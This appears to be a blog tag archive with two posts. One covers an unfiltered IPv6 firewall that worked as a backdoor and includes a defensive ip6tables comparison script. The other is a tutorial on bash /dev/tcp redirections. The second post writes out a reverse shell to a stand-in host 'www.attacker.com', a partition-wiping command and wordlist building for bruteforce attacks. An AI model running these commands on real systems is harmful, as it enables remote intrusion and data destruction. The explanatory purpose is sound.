Tag Archives: Backdoor

IPv6 Backdoor for the Best and Worst!

I’d like to come back to an issue I faced yesterday with one of my servers. I think this story could be a good example as part of an IPv6 awareness programme…

One of my servers in my home lab runs several virtual machines. This server is reachable from outside via a VPN. On Sunday morning, I tried to access it from a remote location and got a nice “connection timeout” on the SSH port. After some checks, the server looked to be OK: all the other services were running fine and the VMs were working as expected. As I always bind sshd to a non-standard port, I tried the standard one (22), thinking of a misconfiguration. Same result… I tried from another box in my LAN: same result. Then I realized that I had upgraded the iptables rules installed on the server a few days before. Damned! Reboot the box? It wouldn’t solve the issue, as the rules would be automatically reloaded, and it could corrupt the files used by the VMs! The only way to solve the problem would be to log in via the console, but I was far from home… In a corporate environment, out-of-band access is common, but not in this case!

Suddenly, an idea: I logged in again on another box in my home LAN which is IPv6 enabled, and from this box I tried to SSH into the server using its IPv6 address. Bingo! It worked. I successfully logged in and fixed the iptables rules to allow my SSH port again.

What to remember from this story? First, shame on me: my mistake (we all make mistakes) was to forget to enable the IPv6 firewall on the server. In this case I was lucky and was able to regain control of the box, but what about a real attacker? IPv6 is deployed on more and more networks, sometimes without people even being aware of it. Thanks to the auto-configuration enabled in most systems, devices will obtain an IPv6 address and be reachable via both stacks: every IPv6-enabled interface gets a link-local address (fe80::/10) as soon as it comes up, even with no router on the network, and a globally routable address follows automatically as soon as a router announces a prefix (SLAAC). Keep in mind that iptables rules filter IPv4 only; IPv6 traffic is handled by ip6tables and needs its own, matching rule set, otherwise every service you carefully filtered on IPv4 is wide open on IPv6.

This is not the first “bad” story I have faced with IPv6 (read here and here). IPv6 will become a challenge in corporate environments. Keep this in mind!
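The check I would now want on any dual-stack host is a comparison of what the IPv4 and IPv6 rule sets actually let in, since the two are loaded and maintained separately. The script below is an added example, not something from the original post: it works on the text of iptables-save and ip6tables-save dumps (so it needs no root to try out), reports the default INPUT policy of a dump, lists the TCP ports accepted over IPv4 but not over IPv6, and prints a minimal ip6tables-restore rule set for a given SSH port. The dumps embedded in it are constructed samples; the SSH port 2222 is an assumption standing in for the non-standard port used in the story.

```shell
#!/bin/sh
# Added example, not part of the original post: compare what an IPv4
# iptables ruleset and an IPv6 ip6tables ruleset let in, and print a
# minimal IPv6 INPUT policy for a given SSH port. Works on the text of
# iptables-save / ip6tables-save dumps, so it runs without root.

# Default policy of the INPUT chain in a *-save dump passed as $1
# (ACCEPT here means the stack is effectively unfiltered).
input_policy() {
    printf '%s\n' "$1" | sed -n -E 's/^:INPUT ([A-Z]+) .*/\1/p'
}

# TCP destination ports accepted in the INPUT chain of a dump read on
# stdin, one per line, de-duplicated.
accepted_tcp_ports() {
    grep -E '^-A INPUT .*-p tcp .*--dport [0-9]+ .*-j ACCEPT' \
        | sed -E 's/.*--dport ([0-9]+).*/\1/' \
        | sort -n | uniq
}

# Ports accepted in the IPv4 dump ($1) but not in the IPv6 dump ($2).
# Any output means the two stacks are filtered differently.
missing_in_v6() {
    v6_ports=$(printf '%s\n' "$2" | accepted_tcp_ports)
    printf '%s\n' "$1" | accepted_tcp_ports | while read -r port; do
        printf '%s\n' "$v6_ports" | grep -qx "$port" || printf '%s\n' "$port"
    done
}

# Minimal ip6tables-restore ruleset: default DROP, loopback, established
# flows, ICMPv6 (required: neighbour discovery and path-MTU discovery run
# over it, so dropping it breaks IPv6 itself) and SSH on port $1.
v6_ruleset() {
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p ipv6-icmp -j ACCEPT
-A INPUT -p tcp -m tcp --dport $1 -j ACCEPT
COMMIT
EOF
}

# Constructed sample dumps standing in for real iptables-save and
# ip6tables-save output. The IPv4 side allows SSH on 2222 (assumed
# non-standard port); the IPv6 side forgot it.
SAMPLE_V4='*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 2222 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT'

SAMPLE_V6='*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -p ipv6-icmp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT'

# Constructed dump of a host that never loaded an IPv6 firewall at all:
# no rules, default ACCEPT. This is the situation described in the post.
UNFILTERED_V6='*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT'

# On a live box: missing_in_v6 "$(iptables-save)" "$(ip6tables-save)"
echo "IPv6 INPUT policy of the unfiltered host: $(input_policy "$UNFILTERED_V6")"
missing_in_v6 "$SAMPLE_V4" "$SAMPLE_V6" | sed 's/^/open over IPv4 but not over IPv6: tcp\//'
```

On a real host feed it the live dumps as shown in the last comment; an INPUT policy of ACCEPT with no rules on the IPv6 side is exactly the state the server above was in. The generated rule set deliberately keeps ICMPv6 open: an IPv6 firewall that drops it looks secure and simply stops working.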


/bin/bash Phone Home

I find UNIX a wonderful OS, whatever the flavour! I have been using it for 17 years and almost every week I learn new stuff. One of the particularities of UNIX is the way it communicates with devices. Except for some specific devices, most of them are managed and visible as files or pseudo-files within the file system hierarchy. This is known as “everything is a file”. Examples: /dev/null, /dev/random, /dev/stdin, /dev/stdout, /proc, etc. Some of those are always linked to the same file descriptor (or “FD”): stdin is 0, stdout is 1 and stderr is 2. Most devices accept the standard system calls like open(), close(), read() and write(). Another particularity of UNIX is the primary user interface: the shell. There are plenty of shells; some of them are more oriented to developers, to highly skilled users, etc. One of them is called “bash” and is available on most UNIX flavours, often as the default one. Most commands executed from your shell can take their input and output via such pseudo-files. Examples:

  bash# cat /dev/random >/dev/sda1                 # overwrite a partition with random data (destructive!)
  bash# tar cvf archive.tar . >/dev/null           # discard the verbose file list
  bash# dd if=/dev/zero of=bigfile count=1000000   # file of zeros: 1,000,000 blocks of 512 bytes

Very convenient! But bash implements something even more interesting: network redirections. It understands the pseudo-files “/dev/tcp/host/port” and “/dev/udp/host/port”. Note that these paths are interpreted by bash itself while it processes a redirection; they do not exist in /dev on Linux, so “cat /dev/tcp/host/port” fails while “cat </dev/tcp/host/port” works, because in the second form it is bash, not cat, that opens the connection. An example?

First, we need to set up a “listener” on the destination host (netcat is your best friend; the syntax below is the traditional netcat one, the OpenBSD variant takes “nc -l 8888”):

  root@destination# nc -l -p 8888

On the source host, bash will send the data to the listener (the redirection target is /dev/tcp followed by the listener’s host and port):

  root@source# bash -c "echo Hello World" >/dev/tcp/

The listener will display:

  root@destination# nc -l -p 8888
  Hello World

Now the question arises: when could those network redirections be helpful? First, bash can be used without third-party tools to grab data from the network. The example below fetches the main page of this blog: it opens file descriptor 5 read-write on the connection, writes the HTTP request to it and reads the response back from it:

  exec 5<> /dev/tcp/blog.rootshell.be/80
  printf "GET / HTTP/1.0\r\n\r\n" >&5
  cat <&5
  exec 5>&-

Very convenient if you don’t have links or curl installed. Just pipe the output to other commands. This can be used to generate dictionary files to conduct a bruteforce attack, by stripping the HTML tags from the saved page and splitting the remaining text into one word per line:

  exec 5<> /dev/tcp/blog.rootshell.be/80
  printf "GET / HTTP/1.0\r\n\r\n" >&5
  cat <&5 >foo.tmp
  exec 5>&-
  sed -e 's|<[!a-zA-Z/][^>]*>||g' foo.tmp | tr " " "\n"

Another nice example is to make bash “phone home”. Let’s launch a reverse shell to an attacker box listening on port 8888: bash reads its commands from the socket (stdin) and sends its output and errors back over the same descriptor:

  victim# bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0

As the bash shell is very common, this can be very interesting! Just use your imagination to find other examples. A final remark: this feature is not available in all pre-compiled or packaged bash builds! Some UNIX flavours consider it dangerous (which is true!) and ship bash with it disabled. The quickest way to tell is to try a redirection: a bash built without the feature reports “No such file or directory” for the /dev/tcp path, while a bash with it reports a network error such as “Connection refused” when the port is closed. If you want to compile your own bash with this feature enabled, the configure flag is “--enable-net-redirections”.